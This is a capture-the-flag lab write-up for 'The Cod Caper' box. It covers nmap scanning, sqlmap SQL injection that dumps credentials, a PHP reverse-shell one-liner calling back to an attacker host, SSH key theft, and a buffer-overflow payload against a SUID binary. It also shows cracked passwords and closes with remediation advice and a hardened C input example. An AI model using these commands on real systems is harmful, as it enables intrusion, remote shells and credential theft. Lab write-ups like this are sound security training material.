
[Linux] The Cod Caper

Reconnaissance

sudo nmap 10.10.108.37
sudo nmap -A -p 22,80 10.10.108.37
sudo nmap --script vuln -p 22,80 10.10.108.37

Enumeration

We found a login page at /administrator.php.

We ran automated SQL injection tests against this form with sqlmap.

sqlmap -u http://10.10.108.37/administrator.php --forms --dump

We obtained some credentials.

+------------+----------+
| password   | username |
+------------+----------+
| secretpass | pingudad |
+------------+----------+

After logging in, we are able to run commands on the host, which we use to obtain a reverse shell.

Exploitation

php -r '$sock=fsockopen("10.10.209.239",4242);exec("/bin/sh -i <&3 >&3 2>&3");'

We found a hidden file on the machine, /var/hidden/pass, whose content is pinguapingu.

Lateral movement

There are two users: papa and pingu. We can export pingu's SSH private key, which will allow us to maintain persistence on the pingu account.

Privilege escalation

A suspicious file, /opt/secret/root, has the SUID bit set. We can download it for further analysis.

chmod 600 id_rsa
scp -i id_rsa pingu@10.10.108.37:/opt/secret/root .

The private key is protected with a passphrase; the password we found in /var/hidden/pass unlocks it.

The file is an executable. We can analyze it with Ghidra, which allows us to examine the execution flow of the executable.

The main function calls scanf, which reads input into a fixed-size buffer with no length bound and is therefore vulnerable to a buffer overflow. We need to determine how this can be exploited. Additionally, we found a function called shell, which accesses a file that could contain sensitive information.

We used PwnGDB to:

  1. Determine the length needed to cause a segmentation fault.

  2. Find the address of the shell function.

  3. Run the script below, then crack the recovered password hashes with john.

python -c 'print "A"*44 + "\xcb\x84\x04\x08"' | /opt/secret/root
john -w=/usr/share/wordlists/rockyou.txt root_hash_pwd
john -w=/usr/share/wordlists/rockyou.txt papa_hash_pwd

Credentials:

  • papa:postman

  • root:lov2fish

Remediation

  • Use strong passwords.

  • Avoid exposing dangerous services online, such as web shells.

  • Refrain from using unbounded input functions such as scanf with a bare %s.

  • Compile C programs with buffer overflow protections.
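To make the scanf finding and the last two remediation points concrete, here is an added example (constructed for this writeup, not the source of the SUID binary on the box, whose code is not shown): the unbounded scanf pattern is shown in a comment, and two bounded replacements follow, one that truncates to the buffer size and one that refuses oversized input outright. Buffer size, function names and the sample input are assumptions.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Constructed illustration of the pattern described in the writeup:
 * a fixed-size stack buffer filled by scanf("%s"), which stops only at
 * whitespace, so longer input writes past the end of the buffer.
 *
 *   char name[32];
 *   scanf("%s", name);   // no bound: overruns the buffer on long input
 */

#define NAME_CAP 32   /* assumed buffer size for this example */

/* Hardened form 1: give scanf an explicit width derived from the buffer
 * size (never a hard-coded literal that can drift from the declaration).
 * Input comes from a string via sscanf so it can be tested without stdin.
 * Returns 1 if a token was read, 0 otherwise. Oversized tokens are
 * truncated to cap-1 characters plus the terminating NUL. */
int read_name_bounded(const char *input, char *out, size_t cap)
{
    char fmt[16];
    snprintf(fmt, sizeof fmt, "%%%zus", cap - 1);   /* e.g. "%31s" */
    out[0] = '\0';
    return sscanf(input, fmt, out) == 1;
}

/* Hardened form 2: reject rather than silently truncate. Copies the first
 * whitespace-delimited token only if it fits; returns 0 for empty or
 * oversized input so the caller can fail closed. */
int read_name_strict(const char *input, char *out, size_t cap)
{
    size_t len = strcspn(input, " \t\r\n");   /* length of first token */
    if (len == 0 || len >= cap)
        return 0;
    memcpy(out, input, len);
    out[len] = '\0';
    return 1;
}

/* Stand-alone use: read one line from stdin and apply the strict reader.
 * Build with e.g. -fstack-protector-strong -D_FORTIFY_SOURCE=2 -fPIE -pie
 * so that any remaining overflow is detected rather than exploitable. */
int main(void)
{
    char line[256], name[NAME_CAP];
    if (!fgets(line, sizeof line, stdin))
        return 1;
    if (!read_name_strict(line, name, sizeof name)) {
        fputs("name empty or too long\n", stderr);
        return 1;
    }
    printf("hello %s\n", name);
    return 0;
}
```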
